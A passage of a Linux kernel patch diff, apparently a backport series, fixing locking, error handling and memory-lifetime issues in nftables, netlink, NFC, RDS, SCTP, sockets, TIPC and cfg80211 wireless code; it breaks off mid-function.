+ 	gc = nft_trans_gc_alloc(set, 0, GFP_ATOMIC);
+ 	if (!gc)
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	/* search for end interval coming before this element.
+ 	 * end intervals don't carry a timeout extension, they
+@@ -261,6 +260,7 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 		prev = rb_prev(prev);
+ 	}
+ 
++	rbe_prev = NULL;
+ 	if (prev) {
+ 		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
+ 		nft_rbtree_gc_remove(net, set, priv, rbe_prev);
+@@ -272,7 +272,7 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 		 */
+ 		gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
+ 		if (WARN_ON_ONCE(!gc))
+-			return -ENOMEM;
++			return ERR_PTR(-ENOMEM);
+ 
+ 		nft_trans_gc_elem_add(gc, rbe_prev);
+ 	}
+@@ -280,13 +280,13 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 	nft_rbtree_gc_remove(net, set, priv, rbe);
+ 	gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
+ 	if (WARN_ON_ONCE(!gc))
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	nft_trans_gc_elem_add(gc, rbe);
+ 
+ 	nft_trans_gc_queue_sync_done(gc);
+ 
+-	return 0;
++	return rbe_prev;
+ }
+ 
+ static bool nft_rbtree_update_first(const struct nft_set *set,
+@@ -314,7 +314,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 	struct nft_rbtree *priv = nft_set_priv(set);
+ 	u8 cur_genmask = nft_genmask_cur(net);
+ 	u8 genmask = nft_genmask_next(net);
+-	int d, err;
++	int d;
+ 
+ 	/* Descend the tree to search for an existing element greater than the
+ 	 * key value to insert that is greater than the new element. This is the
+@@ -363,9 +363,14 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 		 */
+ 		if (nft_set_elem_expired(&rbe->ext) &&
+ 		    nft_set_elem_active(&rbe->ext, cur_genmask)) {
+-			err = nft_rbtree_gc_elem(set, priv, rbe, genmask);
+-			if (err < 0)
+-				return err;
++			const struct nft_rbtree_elem *removed_end;
++
++			removed_end = nft_rbtree_gc_elem(set, priv, rbe, genmask);
++			if (IS_ERR(removed_end))
++				return PTR_ERR(removed_end);
++
++			if (removed_end == rbe_le || removed_end == rbe_ge)
++				return -EAGAIN;
+ 
+ 			continue;
+ 		}
+@@ -486,11 +491,18 @@ static int nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 	struct nft_rbtree_elem *rbe = elem->priv;
+ 	int err;
+ 
+-	write_lock_bh(&priv->lock);
+-	write_seqcount_begin(&priv->count);
+-	err = __nft_rbtree_insert(net, set, rbe, ext);
+-	write_seqcount_end(&priv->count);
+-	write_unlock_bh(&priv->lock);
++	do {
++		if (fatal_signal_pending(current))
++			return -EINTR;
++
++		cond_resched();
++
++		write_lock_bh(&priv->lock);
++		write_seqcount_begin(&priv->count);
++		err = __nft_rbtree_insert(net, set, rbe, ext);
++		write_seqcount_end(&priv->count);
++		write_unlock_bh(&priv->lock);
++	} while (err == -EAGAIN);
+ 
+ 	return err;
+ }
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index 387e430a35ccc..cb833302270a6 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -352,7 +352,7 @@ static void netlink_overrun(struct sock *sk)
+ 	if (!nlk_test_bit(RECV_NO_ENOBUFS, sk)) {
+ 		if (!test_and_set_bit(NETLINK_S_CONGESTED,
+ 				      &nlk_sk(sk)->state)) {
+-			sk->sk_err = ENOBUFS;
++			WRITE_ONCE(sk->sk_err, ENOBUFS);
+ 			sk_error_report(sk);
+ 		}
+ 	}
+@@ -1566,7 +1566,7 @@ static int do_one_set_err(struct sock *sk, struct netlink_set_err_data *p)
+ 		goto out;
+ 	}
+ 
+-	sk->sk_err = p->code;
++	WRITE_ONCE(sk->sk_err, p->code);
+ 	sk_error_report(sk);
+ out:
+ 	return ret;
+@@ -1955,7 +1955,7 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	    atomic_read(&sk->sk_rmem_alloc) <= sk->sk_rcvbuf / 2) {
+ 		ret = netlink_dump(sk);
+ 		if (ret) {
+-			sk->sk_err = -ret;
++			WRITE_ONCE(sk->sk_err, -ret);
+ 			sk_error_report(sk);
+ 		}
+ 	}
+@@ -2443,19 +2443,24 @@ void netlink_ack(struct sk_buff *in_skb, struct nlmsghdr *nlh, int err,
+ 		flags |= NLM_F_ACK_TLVS;
+ 
+ 	skb = nlmsg_new(payload + tlvlen, GFP_KERNEL);
+-	if (!skb) {
+-		NETLINK_CB(in_skb).sk->sk_err = ENOBUFS;
+-		sk_error_report(NETLINK_CB(in_skb).sk);
+-		return;
+-	}
++	if (!skb)
++		goto err_skb;
+ 
+ 	rep = nlmsg_put(skb, NETLINK_CB(in_skb).portid, nlh->nlmsg_seq,
+-			NLMSG_ERROR, payload, flags);
++			NLMSG_ERROR, sizeof(*errmsg), flags);
++	if (!rep)
++		goto err_bad_put;
+ 	errmsg = nlmsg_data(rep);
+ 	errmsg->error = err;
+-	unsafe_memcpy(&errmsg->msg, nlh, payload > sizeof(*errmsg)
+-					 ? nlh->nlmsg_len : sizeof(*nlh),
+-		      /* Bounds checked by the skb layer. */);
++	errmsg->msg = *nlh;
++
++	if (!(flags & NLM_F_CAPPED)) {
++		if (!nlmsg_append(skb, nlmsg_len(nlh)))
++			goto err_bad_put;
++
++		memcpy(nlmsg_data(&errmsg->msg), nlmsg_data(nlh),
++		       nlmsg_len(nlh));
++	}
+ 
+ 	if (tlvlen)
+ 		netlink_ack_tlv_fill(in_skb, skb, nlh, err, extack);
+@@ -2463,6 +2468,14 @@ void netlink_ack(struct sk_buff *in_skb, struct nlmsghdr *nlh, int err,
+ 	nlmsg_end(skb, rep);
+ 
+ 	nlmsg_unicast(in_skb->sk, skb, NETLINK_CB(in_skb).portid);
++
++	return;
++
++err_bad_put:
++	nlmsg_free(skb);
++err_skb:
++	WRITE_ONCE(NETLINK_CB(in_skb).sk->sk_err, ENOBUFS);
++	sk_error_report(NETLINK_CB(in_skb).sk);
+ }
+ EXPORT_SYMBOL(netlink_ack);
+ 
+diff --git a/net/nfc/llcp_core.c b/net/nfc/llcp_core.c
+index f60e424e06076..6705bb895e239 100644
+--- a/net/nfc/llcp_core.c
++++ b/net/nfc/llcp_core.c
+@@ -1636,7 +1636,9 @@ int nfc_llcp_register_device(struct nfc_dev *ndev)
+ 	timer_setup(&local->sdreq_timer, nfc_llcp_sdreq_timer, 0);
+ 	INIT_WORK(&local->sdreq_timeout_work, nfc_llcp_sdreq_timeout_work);
+ 
++	spin_lock(&llcp_devices_lock);
+ 	list_add(&local->list, &llcp_devices);
++	spin_unlock(&llcp_devices_lock);
+ 
+ 	return 0;
+ }
+diff --git a/net/rds/tcp_connect.c b/net/rds/tcp_connect.c
+index f0c477c5d1db4..d788c6d28986f 100644
+--- a/net/rds/tcp_connect.c
++++ b/net/rds/tcp_connect.c
+@@ -173,7 +173,7 @@ int rds_tcp_conn_path_connect(struct rds_conn_path *cp)
+ 	 * own the socket
+ 	 */
+ 	rds_tcp_set_callbacks(sock, cp);
+-	ret = sock->ops->connect(sock, addr, addrlen, O_NONBLOCK);
++	ret = kernel_connect(sock, addr, addrlen, O_NONBLOCK);
+ 
+ 	rdsdebug("connect to address %pI6c returned %d\n", &conn->c_faddr, ret);
+ 	if (ret == -EINPROGRESS)
+diff --git a/net/sctp/associola.c b/net/sctp/associola.c
+index 3460abceba443..2965a12fe8aa2 100644
+--- a/net/sctp/associola.c
++++ b/net/sctp/associola.c
+@@ -1161,8 +1161,7 @@ int sctp_assoc_update(struct sctp_association *asoc,
+ 		/* Add any peer addresses from the new association. */
+ 		list_for_each_entry(trans, &new->peer.transport_addr_list,
+ 				    transports)
+-			if (!sctp_assoc_lookup_paddr(asoc, &trans->ipaddr) &&
+-			    !sctp_assoc_add_peer(asoc, &trans->ipaddr,
++			if (!sctp_assoc_add_peer(asoc, &trans->ipaddr,
+ 						 GFP_ATOMIC, trans->state))
+ 				return -ENOMEM;
+ 
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 32e3669adf146..e25dc17091311 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -2449,6 +2449,7 @@ static int sctp_apply_peer_addr_params(struct sctp_paddrparams *params,
+ 			if (trans) {
+ 				trans->hbinterval =
+ 				    msecs_to_jiffies(params->spp_hbinterval);
++				sctp_transport_reset_hb_timer(trans);
+ 			} else if (asoc) {
+ 				asoc->hbinterval =
+ 				    msecs_to_jiffies(params->spp_hbinterval);
+diff --git a/net/socket.c b/net/socket.c
+index d281a7ef4b1d3..b0169168e3f4e 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -720,6 +720,14 @@ static inline int sock_sendmsg_nosec(struct socket *sock, struct msghdr *msg)
+ 	return ret;
+ }
+ 
++static int __sock_sendmsg(struct socket *sock, struct msghdr *msg)
++{
++	int err = security_socket_sendmsg(sock, msg,
++					  msg_data_left(msg));
++
++	return err ?: sock_sendmsg_nosec(sock, msg);
++}
++
+ /**
+  *	sock_sendmsg - send a message through @sock
+  *	@sock: socket
+@@ -730,10 +738,19 @@ static inline int sock_sendmsg_nosec(struct socket *sock, struct msghdr *msg)
+  */
+ int sock_sendmsg(struct socket *sock, struct msghdr *msg)
+ {
+-	int err = security_socket_sendmsg(sock, msg,
+-					  msg_data_left(msg));
++	struct sockaddr_storage *save_addr = (struct sockaddr_storage *)msg->msg_name;
++	struct sockaddr_storage address;
++	int ret;
+ 
+-	return err ?: sock_sendmsg_nosec(sock, msg);
++	if (msg->msg_name) {
++		memcpy(&address, msg->msg_name, msg->msg_namelen);
++		msg->msg_name = &address;
++	}
++
++	ret = __sock_sendmsg(sock, msg);
++	msg->msg_name = save_addr;
++
++	return ret;
+ }
+ EXPORT_SYMBOL(sock_sendmsg);
+ 
+@@ -1110,7 +1127,7 @@ static ssize_t sock_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 	if (sock->type == SOCK_SEQPACKET)
+ 		msg.msg_flags |= MSG_EOR;
+ 
+-	res = sock_sendmsg(sock, &msg);
++	res = __sock_sendmsg(sock, &msg);
+ 	*from = msg.msg_iter;
+ 	return res;
+ }
+@@ -2114,7 +2131,7 @@ int __sys_sendto(int fd, void __user *buff, size_t len, unsigned int flags,
+ 	if (sock->file->f_flags & O_NONBLOCK)
+ 		flags |= MSG_DONTWAIT;
+ 	msg.msg_flags = flags;
+-	err = sock_sendmsg(sock, &msg);
++	err = __sock_sendmsg(sock, &msg);
+ 
+ out_put:
+ 	fput_light(sock->file, fput_needed);
+@@ -2479,7 +2496,7 @@ static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
+ 		err = sock_sendmsg_nosec(sock, msg_sys);
+ 		goto out_freectl;
+ 	}
+-	err = sock_sendmsg(sock, msg_sys);
++	err = __sock_sendmsg(sock, msg_sys);
+ 	/*
+ 	 * If this is sendmmsg() and sending to current destination address was
+ 	 * successful, remember it.
+diff --git a/net/tipc/crypto.c b/net/tipc/crypto.c
+index 2b236d95a6469..65f59739a041a 100644
+--- a/net/tipc/crypto.c
++++ b/net/tipc/crypto.c
+@@ -1441,14 +1441,14 @@ static int tipc_crypto_key_revoke(struct net *net, u8 tx_key)
+ 	struct tipc_crypto *tx = tipc_net(net)->crypto_tx;
+ 	struct tipc_key key;
+ 
+-	spin_lock(&tx->lock);
++	spin_lock_bh(&tx->lock);
+ 	key = tx->key;
+ 	WARN_ON(!key.active || tx_key != key.active);
+ 
+ 	/* Free the active key */
+ 	tipc_crypto_key_set_state(tx, key.passive, 0, key.pending);
+ 	tipc_crypto_key_detach(tx->aead[key.active], &tx->lock);
+-	spin_unlock(&tx->lock);
++	spin_unlock_bh(&tx->lock);
+ 
+ 	pr_warn("%s: key is revoked\n", tx->name);
+ 	return -EKEYREVOKED;
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 609b79fe4a748..2c79604672062 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -408,6 +408,34 @@ static void cfg80211_propagate_cac_done_wk(struct work_struct *work)
+ 	rtnl_unlock();
+ }
+ 
++static void cfg80211_wiphy_work(struct work_struct *work)
++{
++	struct cfg80211_registered_device *rdev;
++	struct wiphy_work *wk;
++
++	rdev = container_of(work, struct cfg80211_registered_device, wiphy_work);
++
++	wiphy_lock(&rdev->wiphy);
++	if (rdev->suspended)
++		goto out;
++
++	spin_lock_irq(&rdev->wiphy_work_lock);
++	wk = list_first_entry_or_null(&rdev->wiphy_work_list,
++				      struct wiphy_work, entry);
++	if (wk) {
++		list_del_init(&wk->entry);
++		if (!list_empty(&rdev->wiphy_work_list))
++			schedule_work(work);
++		spin_unlock_irq(&rdev->wiphy_work_lock);
++
++		wk->func(&rdev->wiphy, wk);
++	} else {
++		spin_unlock_irq(&rdev->wiphy_work_lock);
++	}
++out:
++	wiphy_unlock(&rdev->wiphy);
++}
++
+ /* exported functions */
+ 
+ struct wiphy *wiphy_new_nm(const struct cfg80211_ops *ops, int sizeof_priv,
+@@ -533,6 +561,9 @@ use_default_name:
+ 		return NULL;
+ 	}
+ 
++	INIT_WORK(&rdev->wiphy_work, cfg80211_wiphy_work);
++	INIT_LIST_HEAD(&rdev->wiphy_work_list);
++	spin_lock_init(&rdev->wiphy_work_lock);
+ 	INIT_WORK(&rdev->rfkill_block, cfg80211_rfkill_block_work);
+ 	INIT_WORK(&rdev->conn_work, cfg80211_conn_work);
+ 	INIT_WORK(&rdev->event_work, cfg80211_event_work);
+@@ -1011,6 +1042,31 @@ void wiphy_rfkill_start_polling(struct wiphy *wiphy)
+ }
+ EXPORT_SYMBOL(wiphy_rfkill_start_polling);
+ 
++void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev)
++{
++	unsigned int runaway_limit = 100;
++	unsigned long flags;
++
++	lockdep_assert_held(&rdev->wiphy.mtx);
++
++	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++	while (!list_empty(&rdev->wiphy_work_list)) {
++		struct wiphy_work *wk;
++
++		wk = list_first_entry(&rdev->wiphy_work_list,
++				      struct wiphy_work, entry);
++		list_del_init(&wk->entry);
++		spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
++
++		wk->func(&rdev->wiphy, wk);
++
++		spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++		if (WARN_ON(--runaway_limit == 0))
++			INIT_LIST_HEAD(&rdev->wiphy_work_list);
++	}
++	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
++}
++
+ void wiphy_unregister(struct wiphy *wiphy)
+ {
+ 	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
+@@ -1049,9 +1105,19 @@ void wiphy_unregister(struct wiphy *wiphy)
+ 	cfg80211_rdev_list_generation++;
+ 	device_del(&rdev->wiphy.dev);
+ 
++#ifdef CONFIG_PM
++	if (rdev->wiphy.wowlan_config && rdev->ops->set_wakeup)
++		rdev_set_wakeup(rdev, false);
++#endif
++
++	/* surely nothing is reachable now, clean up work */
++	cfg80211_process_wiphy_works(rdev);
+ 	wiphy_unlock(&rdev->wiphy);
+ 	rtnl_unlock();
+ 
++	/* this has nothing to do now but make sure it's gone */
++	cancel_work_sync(&rdev->wiphy_work);
++
+ 	flush_work(&rdev->scan_done_wk);
+ 	cancel_work_sync(&rdev->conn_work);
+ 	flush_work(&rdev->event_work);
+@@ -1064,10 +1130,6 @@ void wiphy_unregister(struct wiphy *wiphy)
+ 	flush_work(&rdev->mgmt_registrations_update_wk);
+ 	flush_work(&rdev->background_cac_abort_wk);
+ 
+-#ifdef CONFIG_PM
+-	if (rdev->wiphy.wowlan_config && rdev->ops->set_wakeup)
+-		rdev_set_wakeup(rdev, false);
+-#endif
+ 	cfg80211_rdev_free_wowlan(rdev);
+ 	cfg80211_rdev_free_coalesce(rdev);
+ }
+@@ -1114,16 +1176,11 @@ void wiphy_rfkill_set_hw_state_reason(struct wiphy *wiphy, bool blocked,
+ }
+ EXPORT_SYMBOL(wiphy_rfkill_set_hw_state_reason);
+ 
+-void cfg80211_cqm_config_free(struct wireless_dev *wdev)
+-{
+-	kfree(wdev->cqm_config);
+-	wdev->cqm_config = NULL;
+-}
+-
+ static void _cfg80211_unregister_wdev(struct wireless_dev *wdev,
+ 				      bool unregister_netdev)
+ {
+ 	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wdev->wiphy);
++	struct cfg80211_cqm_config *cqm_config;
+ 	unsigned int link_id;
+ 
+ 	ASSERT_RTNL();
+@@ -1162,11 +1219,10 @@ static void _cfg80211_unregister_wdev(struct wireless_dev *wdev,
+ 	kfree_sensitive(wdev->wext.keys);
+ 	wdev->wext.keys = NULL;
+ #endif
+-	/* only initialized if we have a netdev */
+-	if (wdev->netdev)
+-		flush_work(&wdev->disconnect_wk);
+-
+-	cfg80211_cqm_config_free(wdev);
++	wiphy_work_cancel(wdev->wiphy, &wdev->cqm_rssi_work);
++	/* deleted from the list, so can't be found from nl80211 any more */
++	cqm_config = rcu_access_pointer(wdev->cqm_config);
++	kfree_rcu(cqm_config, rcu_head);
+ 
+ 	/*
+ 	 * Ensure that all events have been processed and
+@@ -1318,6 +1374,8 @@ void cfg80211_init_wdev(struct wireless_dev *wdev)
+ 	wdev->wext.connect.auth_type = NL80211_AUTHTYPE_AUTOMATIC;
+ #endif
+ 
++	wiphy_work_init(&wdev->cqm_rssi_work, cfg80211_cqm_rssi_notify_work);
++
+ 	if (wdev->wiphy->flags & WIPHY_FLAG_PS_ON_BY_DEFAULT)
+ 		wdev->ps = true;
+ 	else
+@@ -1439,6 +1497,8 @@ static int cfg80211_netdev_notifier_call(struct notifier_block *nb,
+ 		cfg80211_leave(rdev, wdev);
+ 		cfg80211_remove_links(wdev);
+ 		wiphy_unlock(&rdev->wiphy);
++		/* since we just did cfg80211_leave() nothing to do there */
++		cancel_work_sync(&wdev->disconnect_wk);
+ 		break;
+ 	case NETDEV_DOWN:
+ 		wiphy_lock(&rdev->wiphy);
+@@ -1548,6 +1608,66 @@ static struct pernet_operations cfg80211_pernet_ops = {
+ 	.exit = cfg80211_pernet_exit,
+ };
+ 
++void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work)
++{
++	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
++	unsigned long flags;
++
++	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++	if (list_empty(&work->entry))
++		list_add_tail(&work->entry, &rdev->wiphy_work_list);
++	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
++
++	schedule_work(&rdev->wiphy_work);
++}
++EXPORT_SYMBOL_GPL(wiphy_work_queue);
++
++void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work)
++{
++	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
++	unsigned long flags;
++
++	lockdep_assert_held(&wiphy->mtx);
++
++	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++	if (!list_empty(&work->entry))
++		list_del_init(&work->entry);
++	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
++}
++EXPORT_SYMBOL_GPL(wiphy_work_cancel);
++
++void wiphy_delayed_work_timer(struct timer_list *t)
++{
++	struct wiphy_delayed_work *dwork = from_timer(dwork, t, timer);
++
++	wiphy_work_queue(dwork->wiphy, &dwork->work);
++}
++EXPORT_SYMBOL(wiphy_delayed_work_timer);
++
++void wiphy_delayed_work_queue(struct wiphy *wiphy,
++			      struct wiphy_delayed_work *dwork,
++			      unsigned long delay)
++{
++	if (!delay) {
++		wiphy_work_queue(wiphy, &dwork->work);
++		return;
++	}
++
++	dwork->wiphy = wiphy;
++	mod_timer(&dwork->timer, jiffies + delay);
++}
++EXPORT_SYMBOL_GPL(wiphy_delayed_work_queue);
++
++void wiphy_delayed_work_cancel(struct wiphy *wiphy,
++			       struct wiphy_delayed_work *dwork)
++{
++	lockdep_assert_held(&wiphy->mtx);
++
++	del_timer_sync(&dwork->timer);
++	wiphy_work_cancel(wiphy, &dwork->work);
++}
++EXPORT_SYMBOL_GPL(wiphy_delayed_work_cancel);
++
+ static int __init cfg80211_init(void)
+ {
+ 	int err;
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index 775e16cb99eda..86fd79912254d 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -108,6 +108,12 @@ struct cfg80211_registered_device {
+ 	/* lock for all wdev lists */
+ 	spinlock_t mgmt_registrations_lock;
+ 
++	struct work_struct wiphy_work;
++	struct list_head wiphy_work_list;
++	/* protects the list above */
++	spinlock_t wiphy_work_lock;
++	bool suspended;
++
+ 	/* must be last because of the way we do wiphy_priv(),
+ 	 * and it should at least be aligned to NETDEV_ALIGN */
+ 	struct wiphy wiphy __aligned(NETDEV_ALIGN);
+@@ -287,12 +293,17 @@ struct cfg80211_beacon_registration {
+ };
+ 
+ struct cfg80211_cqm_config {
++	struct rcu_head rcu_head;
+ 	u32 rssi_hyst;
+ 	s32 last_rssi_event_value;
++	enum nl80211_cqm_rssi_threshold_event last_rssi_event_type;
+ 	int n_rssi_thresholds;
+ 	s32 rssi_thresholds[];
+ };
+ 
++void cfg80211_cqm_rssi_notify_work(struct wiphy *wiphy,
++				   struct wiphy_work *work);
++
+ void cfg80211_destroy_ifaces(struct cfg80211_registered_device *rdev);
+ 
+ /* free object */
+@@ -450,6 +461,7 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev,
+ 			  struct net_device *dev, enum nl80211_iftype ntype,
+ 			  struct vif_params *params);
+ void cfg80211_process_rdev_events(struct cfg80211_registered_device *rdev);
++void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev);
+ void cfg80211_process_wdev_events(struct wireless_dev *wdev);
+ 
+ bool cfg80211_does_bw_fit_range(const struct ieee80211_freq_range *freq_range,
+@@ -556,8 +568,6 @@ cfg80211_bss_update(struct cfg80211_registered_device *rdev,
+ #define CFG80211_DEV_WARN_ON(cond)	({bool __r = (cond); __r; })
+ #endif
+ 
+-void cfg80211_cqm_config_free(struct wireless_dev *wdev);
+-
+ void cfg80211_release_pmsr(struct wireless_dev *wdev, u32 portid);
+ void cfg80211_pmsr_wdev_down(struct wireless_dev *wdev);
+ void cfg80211_pmsr_free_wk(struct work_struct *work);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 12c7c89d5be1d..1d993a490ac4b 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -12565,7 +12565,8 @@ static int nl80211_set_cqm_txe(struct genl_info *info,
+ }
+ 
+ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+-				    struct net_device *dev)
++				    struct net_device *dev,
++				    struct cfg80211_cqm_config *cqm_config)
+ {
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+ 	s32 last, low, high;
+@@ -12574,7 +12575,7 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 	int err;
+ 
+ 	/* RSSI reporting disabled? */
+-	if (!wdev->cqm_config)
++	if (!cqm_config)
+ 		return rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
+ 
+ 	/*
+@@ -12583,7 +12584,7 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 	 * connection is established and enough beacons received to calculate
+ 	 * the average.
+ 	 */
+-	if (!wdev->cqm_config->last_rssi_event_value &&
++	if (!cqm_config->last_rssi_event_value &&
+ 	    wdev->links[0].client.current_bss &&
+ 	    rdev->ops->get_station) {
+ 		struct station_info sinfo = {};
+@@ -12597,30 +12598,30 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 
+ 		cfg80211_sinfo_release_content(&sinfo);
+ 		if (sinfo.filled & BIT_ULL(NL80211_STA_INFO_BEACON_SIGNAL_AVG))
+-			wdev->cqm_config->last_rssi_event_value =
++			cqm_config->last_rssi_event_value =
+ 				(s8) sinfo.rx_beacon_signal_avg;
+ 	}
+ 
+-	last = wdev->cqm_config->last_rssi_event_value;
+-	hyst = wdev->cqm_config->rssi_hyst;
+-	n = wdev->cqm_config->n_rssi_thresholds;
++	last = cqm_config->last_rssi_event_value;
++	hyst = cqm_config->rssi_hyst;
++	n = cqm_config->n_rssi_thresholds;
+ 
+ 	for (i = 0; i < n; i++) {
+ 		i = array_index_nospec(i, n);
+-		if (last < wdev->cqm_config->rssi_thresholds[i])
++		if (last < cqm_config->rssi_thresholds[i])
+ 			break;
+ 	}
+ 
+ 	low_index = i - 1;
+ 	if (low_index >= 0) {
+ 		low_index = array_index_nospec(low_index, n);
+-		low = wdev->cqm_config->rssi_thresholds[low_index] - hyst;
++		low = cqm_config->rssi_thresholds[low_index] - hyst;
+ 	} else {
+ 		low = S32_MIN;
+ 	}
+ 	if (i < n) {
+ 		i = array_index_nospec(i, n);
+-		high = wdev->cqm_config->rssi_thresholds[i] + hyst - 1;
++		high = cqm_config->rssi_thresholds[i] + hyst - 1;
+ 	} else {
+ 		high = S32_MAX;
+ 	}
+@@ -12633,6 +12634,7 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 				u32 hysteresis)
+ {
+ 	struct cfg80211_registered_device *rdev = info->user_ptr[0];
++	struct cfg80211_cqm_config *cqm_config = NULL, *old;
+ 	struct net_device *dev = info->user_ptr[1];
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+ 	int i, err;
+@@ -12650,10 +12652,6 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	    wdev->iftype != NL80211_IFTYPE_P2P_CLIENT)
+ 		return -EOPNOTSUPP;
+ 
+-	wdev_lock(wdev);
+-	cfg80211_cqm_config_free(wdev);
+-	wdev_unlock(wdev);
+-
+ 	if (n_thresholds <= 1 && rdev->ops->set_cqm_rssi_config) {
+ 		if (n_thresholds == 0 || thresholds[0] == 0) /* Disabling */
+ 			return rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+@@ -12670,9 +12668,10 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 		n_thresholds = 0;
+ 
+ 	wdev_lock(wdev);
+-	if (n_thresholds) {
+-		struct cfg80211_cqm_config *cqm_config;
++	old = rcu_dereference_protected(wdev->cqm_config,
++					lockdep_is_held(&wdev->mtx));
+ 
++	if (n_thresholds) {
+ 		cqm_config = kzalloc(struct_size(cqm_config, rssi_thresholds,
+ 						 n_thresholds),
+ 				     GFP_KERNEL);
+@@ -12687,11 +12686,18 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 		       flex_array_size(cqm_config, rssi_thresholds,
+ 				       n_thresholds));
+ 
+-		wdev->cqm_config = cqm_config;
++		rcu_assign_pointer(wdev->cqm_config, cqm_config);
++	} else {
++		RCU_INIT_POINTER(wdev->cqm_config, NULL);
+ 	}
+ 
+-	err = cfg80211_cqm_rssi_update(rdev, dev);
+-
++	err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
++	if (err) {
++		rcu_assign_pointer(wdev->cqm_config, old);
++		kfree_rcu(cqm_config, rcu_head);
++	} else {
++		kfree_rcu(old, rcu_head);
++	}
+ unlock:
+ 	wdev_unlock(wdev);
+ 
+@@ -18719,9 +18725,8 @@ void cfg80211_cqm_rssi_notify(struct net_device *dev,
+ 			      enum nl80211_cqm_rssi_threshold_event rssi_event,
+ 			      s32 rssi_level, gfp_t gfp)
+ {
+-	struct sk_buff *msg;
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+-	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wdev->wiphy);
++	struct cfg80211_cqm_config *cqm_config;
+ 
+ 	trace_cfg80211_cqm_rssi_notify(dev, rssi_event, rssi_level);
+ 
+@@ -18729,18 +18734,41 @@ void cfg80211_cqm_rssi_notify(struct net_device *dev,
+ 		    rssi_event != NL80211_CQM_RSSI_THRESHOLD_EVENT_HIGH))
+ 		return;
+ 
+-	if (wdev->cqm_config) {
+-		wdev->cqm_config->last_rssi_event_value = rssi_level;
++	rcu_read_lock();
++	cqm_config = rcu_dereference(wdev->cqm_config);
++	if (cqm_config) {
++		cqm_config->last_rssi_event_value = rssi_level;
++		cqm_config->last_rssi_event_type = rssi_event;
++		wiphy_work_queue(wdev->wiphy, &wdev->cqm_rssi_work);
++	}
++	rcu_read_unlock();
++}
++EXPORT_SYMBOL(cfg80211_cqm_rssi_notify);
++
++void cfg80211_cqm_rssi_notify_work(struct wiphy *wiphy, struct wiphy_work *work)
++{
++	struct wireless_dev *wdev = container_of(work, struct wireless_dev,
++						 cqm_rssi_work);
++	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
++	enum nl80211_cqm_rssi_threshold_event rssi_event;
++	struct cfg80211_cqm_config *cqm_config;
++	struct sk_buff *msg;
++	s32 rssi_level;
+ 
+-		cfg80211_cqm_rssi_update(rdev, dev);
++	wdev_lock(wdev);
++	cqm_config = rcu_dereference_protected(wdev->cqm_config,
++					       lockdep_is_held(&wdev->mtx));
++	if (!wdev->cqm_config)
++		goto unlock;
+ 
+-		if (rssi_level == 0)
+-			rssi_level = wdev->cqm_config->last_rssi_event_value;
+-	}
++	cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
+ 
+-	msg = cfg80211_prepare_cqm(dev, NULL, gfp);
++	rssi_level = cqm_config->last_rssi_event_value;
++	rssi_event = cqm_config->last_rssi_event_type;
++
